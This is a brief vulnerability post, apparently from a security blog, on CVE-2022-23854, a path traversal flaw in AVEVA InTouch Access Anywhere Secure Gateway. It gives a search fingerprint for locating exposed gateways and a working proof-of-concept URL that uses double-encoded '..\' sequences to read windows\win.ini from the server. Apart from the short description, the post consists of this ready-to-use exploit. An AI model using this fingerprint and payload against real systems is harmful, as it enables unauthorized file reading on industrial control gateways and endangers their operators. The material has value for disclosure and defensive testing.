Aveva Intouch Security Gateway Accessanywhere Arbitrary File Reading Vulnerability Cve 2022 23854
Aveva Intouch Security Gateway Accessanywhere Arbitrary File Reading Vulnerability Cve 2022 23854
AVEVA InTouch Security Gateway AccessAnywhere Arbitrary File Reading Vulnerability CVE-2022-23854
Vulnerability Description
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 and previous versions have a path traversal vulnerability that can be used by unauthorized attackers to obtain server sensitive information.
Vulnerability Impact
AVEVA InTouch Security Gateway
Network surveying and mapping
body=”InTouch Access Anywhere”
Vulnerability reappears
Login page
Verify POC
1
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
This post is licensed under CC BY 4.0 by the author.